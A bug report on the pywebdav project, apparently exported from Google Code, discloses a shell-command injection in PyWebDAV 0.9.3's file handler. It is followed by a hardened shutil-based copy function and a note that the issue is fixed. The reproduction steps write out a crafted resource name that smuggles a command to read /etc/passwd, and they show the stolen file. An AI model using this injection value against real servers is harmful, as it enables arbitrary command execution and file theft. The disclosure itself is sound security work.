HN44 / pywebdav

Automatically exported from code.google.com/p/pywebdav

Remote user can run any shell command through DAVServer #32

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
To reproduce:
1. Download PyWebDAV-0.9.3 and start the server from DAVServer-folder with
for example:
PYTHONPATH=../ python server.py -D /tmp -n

2. Get cadaver-webdav client (http://www.webdav.org/cadaver/)

3. Run these commands to get /etc/passwd. Any other command can be run
instead also.

user@host:~$ touch dummy
user@host:~$ cadaver http://localhost:8008/
dav:/> put dummy '\'||cp $\'\\057etc\\057passwd\'\''
Uploading dummy to `/%27%7c%7ccp%20%24%27%5c057etc%5c057passwd%27%27':
succeeded.
dav:/> cp '\'||cp $\'\\057etc\\057passwd\'\'' passwd
Copying `/%27%7c%7ccp%20%24%27%5c057etc%5c057passwd%27%27' to `/passwd': 
succeeded.
dav:/> get passwd passwd
Downloading `/passwd' to passwd:
Progress: [=============================>] 100,0% of 2176 bytes succeeded.
dav:/> 
Connection to `localhost' closed.
user@host:~$ head passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh

The reason is that fshandler.py makes extensive use of os.system and does
not escape the arguments. The shutil python module would be better suited
for the purpose.

Original issue reported on code.google.com by Petteri.Aimonen on 14 Apr 2010 at 11:52
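As an added example (not PyWebDAV's own fshandler.py), a copy handler written the way the report suggests: shutil instead of an os.system("cp ...") command line, so the resource names are passed as path arguments and never reach /bin/sh. The names copy_resource and dav_root, and the confinement check against the DAV root, are assumptions of this example.

```python
import os
import shutil
import tempfile

# Added example, not PyWebDAV's fshandler.py. It does the copy the way the
# report suggests: shutil instead of an os.system("cp ...") command line, so
# the WebDAV resource names are path arguments and never reach /bin/sh.
# copy_resource and dav_root are hypothetical names.

def copy_resource(dav_root, src_name, dst_name):
    """Copy one resource to another name inside dav_root; return dst path.

    Raises FileNotFoundError (a 404 for the handler) if the source is
    missing and ValueError if either name would resolve outside dav_root.
    """
    root = os.path.realpath(dav_root)
    src = os.path.realpath(os.path.join(root, src_name.lstrip("/")))
    dst = os.path.realpath(os.path.join(root, dst_name.lstrip("/")))
    for path in (src, dst):
        if os.path.commonpath([root, path]) != root:
            raise ValueError("resource outside DAV root: %r" % path)
    # Plain file-to-file copy in Python: no shell is spawned, so quotes,
    # '||' or $'...' sequences in a name are just bytes of a filename.
    shutil.copyfile(src, dst)
    return dst


def check_literal_copy():
    """Constructed check using the resource name from the report: the
    hardened copy treats it as a filename and copies the dummy content."""
    root = tempfile.mkdtemp()
    try:
        hostile = "'||cp $'\\057etc\\057passwd''"
        with open(os.path.join(root, hostile), "w") as f:
            f.write("dummy\n")
        with open(copy_resource(root, hostile, "passwd")) as f:
            data = f.read()
        # A name that climbs out of the root must be refused, not resolved.
        try:
            copy_resource(root, "../../etc/passwd", "leak")
            escaped = True
        except ValueError:
            escaped = False
        return data == "dummy\n" and not escaped
    finally:
        shutil.rmtree(root)
```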

GoogleCodeExporter commented 8 years ago
Fixed - thanks for the report

Original comment by spamsch@gmail.com on 15 Apr 2010 at 10:45